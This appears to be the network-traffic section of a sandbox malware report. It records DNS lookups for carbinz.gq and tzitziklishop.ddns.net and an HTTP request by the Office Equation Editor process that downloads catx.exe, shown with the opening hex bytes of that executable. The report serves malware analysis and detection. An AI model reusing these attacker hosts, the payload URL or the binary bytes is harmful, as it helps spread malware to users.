Jun 9, 2021 07:47:55.581304073 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581336975 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581348896 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581381083 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581398010 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581414938 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581430912 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581450939 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581455946 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581459045 CEST	49167	80	192.168.2.22	185.239.243.112
Jun 9, 2021 07:47:55.581492901 CEST	80	49167	185.239.243.112	192.168.2.22
Jun 9, 2021 07:47:55.581511021 CEST	80	49167	185.239.243.112	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 07:47:55.277926922 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 9, 2021 07:47:55.320349932 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 9, 2021 07:47:55.320599079 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 9, 2021 07:47:55.363308907 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 9, 2021 07:48:04.433283091 CEST	53099	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:04.731108904 CEST	53	53099	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:04.731815100 CEST	53099	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:04.833187103 CEST	53	53099	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:04.833657980 CEST	53099	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:04.886827946 CEST	53	53099	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:11.149085999 CEST	52838	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:11.228575945 CEST	53	52838	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:11.229499102 CEST	52838	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:11.282732964 CEST	53	52838	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:11.283324003 CEST	52838	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:11.336807013 CEST	53	52838	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:17.554533958 CEST	61200	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:17.608417034 CEST	53	61200	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:17.609359980 CEST	61200	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:17.665515900 CEST	53	61200	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:23.854923010 CEST	49548	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:24.665788889 CEST	53	49548	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:24.666657925 CEST	49548	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:25.591880083 CEST	53	49548	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:25.592422962 CEST	49548	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:26.283607960 CEST	53	49548	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:26.284337044 CEST	49548	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:26.633527040 CEST	53	49548	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:26.935800076 CEST	49548	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:26.989948034 CEST	53	49548	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:57.724462032 CEST	55627	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:57.895217896 CEST	53	55627	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:57.896125078 CEST	55627	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:57.961869955 CEST	53	55627	37.235.1.174	192.168.2.22
Jun 9, 2021 07:48:57.969656944 CEST	55627	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:48:58.024171114 CEST	53	55627	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:04.183125973 CEST	56009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:04.309087038 CEST	53	56009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:04.309766054 CEST	56009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:04.365986109 CEST	53	56009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:04.451685905 CEST	56009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:04.507222891 CEST	53	56009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:04.515960932 CEST	56009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:04.570236921 CEST	53	56009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:10.729455948 CEST	61865	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:11.701302052 CEST	53	61865	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:11.702038050 CEST	61865	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:12.389694929 CEST	53	61865	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:12.390397072 CEST	61865	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:14.393976927 CEST	61865	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:14.452877998 CEST	53	61865	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:14.453613997 CEST	61865	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:14.507632017 CEST	53	61865	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:20.778650045 CEST	55171	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:20.832087994 CEST	53	55171	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:20.832603931 CEST	55171	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:20.957101107 CEST	53	55171	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:20.958050013 CEST	55171	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:21.156166077 CEST	53	55171	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:21.157111883 CEST	55171	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:21.321830988 CEST	53	55171	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:21.322479963 CEST	55171	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:21.500983953 CEST	53	55171	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:21.533080101 CEST	52496	53	192.168.2.22	37.235.1.177
Jun 9, 2021 07:49:21.601020098 CEST	53	52496	37.235.1.177	192.168.2.22
Jun 9, 2021 07:49:21.603231907 CEST	52496	53	192.168.2.22	37.235.1.177
Jun 9, 2021 07:49:21.657058954 CEST	53	52496	37.235.1.177	192.168.2.22
Jun 9, 2021 07:49:27.875927925 CEST	57564	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:27.930059910 CEST	53	57564	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:27.930829048 CEST	57564	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:27.984805107 CEST	53	57564	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:34.160372019 CEST	63009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:34.515371084 CEST	53	63009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:34.516086102 CEST	63009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:34.803627968 CEST	53	63009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:34.804227114 CEST	63009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:34.937207937 CEST	53	63009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:34.937875032 CEST	63009	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:35.009273052 CEST	53	63009	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:41.351500034 CEST	59319	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:41.406208992 CEST	53	59319	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:41.406763077 CEST	59319	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:41.459857941 CEST	53	59319	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:47.737394094 CEST	53070	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:47.863590002 CEST	53	53070	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:47.864509106 CEST	53070	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:47.922965050 CEST	53	53070	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:54.142355919 CEST	59770	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:55.144233942 CEST	59770	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:49:55.147496939 CEST	53	59770	37.235.1.174	192.168.2.22
Jun 9, 2021 07:49:55.586288929 CEST	53	59770	37.235.1.174	192.168.2.22
Jun 9, 2021 07:50:01.375185013 CEST	61523	53	192.168.2.22	37.235.1.174
Jun 9, 2021 07:50:01.431826115 CEST	53	61523	37.235.1.174	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 9, 2021 07:49:55.586394072 CEST	192.168.2.22	37.235.1.174	e7a5	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 9, 2021 07:47:55.277926922 CEST	192.168.2.22	8.8.8.8	0x6029	Standard query (0)	carbinz.gq	A (IP address)	IN (0x0001)
Jun 9, 2021 07:47:55.320599079 CEST	192.168.2.22	8.8.8.8	0x6029	Standard query (0)	carbinz.gq	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.433283091 CEST	192.168.2.22	37.235.1.174	0x21e6	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.731815100 CEST	192.168.2.22	37.235.1.174	0x21e6	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.833657980 CEST	192.168.2.22	37.235.1.174	0x21e6	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.149085999 CEST	192.168.2.22	37.235.1.174	0x785a	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.229499102 CEST	192.168.2.22	37.235.1.174	0x785a	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.283324003 CEST	192.168.2.22	37.235.1.174	0x785a	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:17.554533958 CEST	192.168.2.22	37.235.1.174	0xa6ed	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:17.609359980 CEST	192.168.2.22	37.235.1.174	0xa6ed	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:23.854923010 CEST	192.168.2.22	37.235.1.174	0x758f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:24.666657925 CEST	192.168.2.22	37.235.1.174	0x758f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:25.592422962 CEST	192.168.2.22	37.235.1.174	0x758f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:26.284337044 CEST	192.168.2.22	37.235.1.174	0x758f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:26.935800076 CEST	192.168.2.22	37.235.1.174	0x758f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:57.724462032 CEST	192.168.2.22	37.235.1.174	0xf75c	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:57.896125078 CEST	192.168.2.22	37.235.1.174	0xf75c	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:57.969656944 CEST	192.168.2.22	37.235.1.174	0xf75c	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.183125973 CEST	192.168.2.22	37.235.1.174	0xda3e	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.309766054 CEST	192.168.2.22	37.235.1.174	0xda3e	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.451685905 CEST	192.168.2.22	37.235.1.174	0xda3e	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.515960932 CEST	192.168.2.22	37.235.1.174	0xda3e	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:10.729455948 CEST	192.168.2.22	37.235.1.174	0xe5d1	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:11.702038050 CEST	192.168.2.22	37.235.1.174	0xe5d1	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:12.390397072 CEST	192.168.2.22	37.235.1.174	0xe5d1	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:14.393976927 CEST	192.168.2.22	37.235.1.174	0xe5d1	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:14.453613997 CEST	192.168.2.22	37.235.1.174	0xe5d1	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:20.778650045 CEST	192.168.2.22	37.235.1.174	0x541f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:20.832603931 CEST	192.168.2.22	37.235.1.174	0x541f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:20.958050013 CEST	192.168.2.22	37.235.1.174	0x541f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.157111883 CEST	192.168.2.22	37.235.1.174	0x541f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.322479963 CEST	192.168.2.22	37.235.1.174	0x541f	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.533080101 CEST	192.168.2.22	37.235.1.177	0xce3b	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.603231907 CEST	192.168.2.22	37.235.1.177	0xce3b	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:27.875927925 CEST	192.168.2.22	37.235.1.174	0xfbea	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:27.930829048 CEST	192.168.2.22	37.235.1.174	0xfbea	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.160372019 CEST	192.168.2.22	37.235.1.174	0x774	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.516086102 CEST	192.168.2.22	37.235.1.174	0x774	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.804227114 CEST	192.168.2.22	37.235.1.174	0x774	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.937875032 CEST	192.168.2.22	37.235.1.174	0x774	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:41.351500034 CEST	192.168.2.22	37.235.1.174	0xffdc	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:41.406763077 CEST	192.168.2.22	37.235.1.174	0xffdc	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:47.737394094 CEST	192.168.2.22	37.235.1.174	0x4223	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:47.864509106 CEST	192.168.2.22	37.235.1.174	0x4223	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:54.142355919 CEST	192.168.2.22	37.235.1.174	0xc63d	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:55.144233942 CEST	192.168.2.22	37.235.1.174	0xc63d	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)
Jun 9, 2021 07:50:01.375185013 CEST	192.168.2.22	37.235.1.174	0xea66	Standard query (0)	tzitziklishop.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 9, 2021 07:47:55.320349932 CEST	8.8.8.8	192.168.2.22	0x6029	No error (0)	carbinz.gq	185.239.243.112	A (IP address)	IN (0x0001)
Jun 9, 2021 07:47:55.363308907 CEST	8.8.8.8	192.168.2.22	0x6029	No error (0)	carbinz.gq	185.239.243.112	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.731108904 CEST	37.235.1.174	192.168.2.22	0x21e6	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.833187103 CEST	37.235.1.174	192.168.2.22	0x21e6	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:04.886827946 CEST	37.235.1.174	192.168.2.22	0x21e6	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.228575945 CEST	37.235.1.174	192.168.2.22	0x785a	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.282732964 CEST	37.235.1.174	192.168.2.22	0x785a	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:11.336807013 CEST	37.235.1.174	192.168.2.22	0x785a	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:17.608417034 CEST	37.235.1.174	192.168.2.22	0xa6ed	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:17.665515900 CEST	37.235.1.174	192.168.2.22	0xa6ed	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:24.665788889 CEST	37.235.1.174	192.168.2.22	0x758f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:25.591880083 CEST	37.235.1.174	192.168.2.22	0x758f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:26.283607960 CEST	37.235.1.174	192.168.2.22	0x758f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:26.633527040 CEST	37.235.1.174	192.168.2.22	0x758f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:26.989948034 CEST	37.235.1.174	192.168.2.22	0x758f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:57.895217896 CEST	37.235.1.174	192.168.2.22	0xf75c	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:57.961869955 CEST	37.235.1.174	192.168.2.22	0xf75c	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:48:58.024171114 CEST	37.235.1.174	192.168.2.22	0xf75c	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.309087038 CEST	37.235.1.174	192.168.2.22	0xda3e	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.365986109 CEST	37.235.1.174	192.168.2.22	0xda3e	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.507222891 CEST	37.235.1.174	192.168.2.22	0xda3e	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:04.570236921 CEST	37.235.1.174	192.168.2.22	0xda3e	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:11.701302052 CEST	37.235.1.174	192.168.2.22	0xe5d1	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:12.389694929 CEST	37.235.1.174	192.168.2.22	0xe5d1	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:14.452877998 CEST	37.235.1.174	192.168.2.22	0xe5d1	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:14.507632017 CEST	37.235.1.174	192.168.2.22	0xe5d1	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:20.832087994 CEST	37.235.1.174	192.168.2.22	0x541f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:20.957101107 CEST	37.235.1.174	192.168.2.22	0x541f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.156166077 CEST	37.235.1.174	192.168.2.22	0x541f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.321830988 CEST	37.235.1.174	192.168.2.22	0x541f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.500983953 CEST	37.235.1.174	192.168.2.22	0x541f	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.601020098 CEST	37.235.1.177	192.168.2.22	0xce3b	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:21.657058954 CEST	37.235.1.177	192.168.2.22	0xce3b	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:27.930059910 CEST	37.235.1.174	192.168.2.22	0xfbea	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:27.984805107 CEST	37.235.1.174	192.168.2.22	0xfbea	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.515371084 CEST	37.235.1.174	192.168.2.22	0x774	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.803627968 CEST	37.235.1.174	192.168.2.22	0x774	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:34.937207937 CEST	37.235.1.174	192.168.2.22	0x774	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:35.009273052 CEST	37.235.1.174	192.168.2.22	0x774	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:41.406208992 CEST	37.235.1.174	192.168.2.22	0xffdc	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:41.459857941 CEST	37.235.1.174	192.168.2.22	0xffdc	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:47.863590002 CEST	37.235.1.174	192.168.2.22	0x4223	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:47.922965050 CEST	37.235.1.174	192.168.2.22	0x4223	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:55.147496939 CEST	37.235.1.174	192.168.2.22	0xc63d	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:49:55.586288929 CEST	37.235.1.174	192.168.2.22	0xc63d	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)
Jun 9, 2021 07:50:01.431826115 CEST	37.235.1.174	192.168.2.22	0xea66	No error (0)	tzitziklishop.ddns.net	103.133.106.117	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

carbinz.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	185.239.243.112	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2021 07:47:55.426242113 CEST	0	OUT	GET /modex/catx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: carbinz.gq Connection: Keep-Alive
Jun 9, 2021 07:47:55.477751970 CEST	2	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 09 Jun 2021 05:47:55 GMT Content-Type: application/x-msdownload Content-Length: 736256 Last-Modified: Tue, 08 Jun 2021 16:00:42 GMT Connection: keep-alive ETag: "60bf942a-b3c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 6a bf 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 32 0b 00 00 08 00 00 00 00 00 00 c2 51 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 51 0b 00 4f 00 00 00 00 60 0b 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 38 50 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 31 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 0b 00 00 06 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 51 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 ab 01 00 08 cd 00 00 03 00 00 00 6b 00 00 06 b0 78 02 00 88 d7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 02 72 01 00 00 70 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 2a 00 13 30 04 00 3f 01 00 00 01 00 00 11 00 02 7b 11 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 5c 02 7b 0d 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 45 02 7b 10 00 00 04 6f 15 00 00 0a 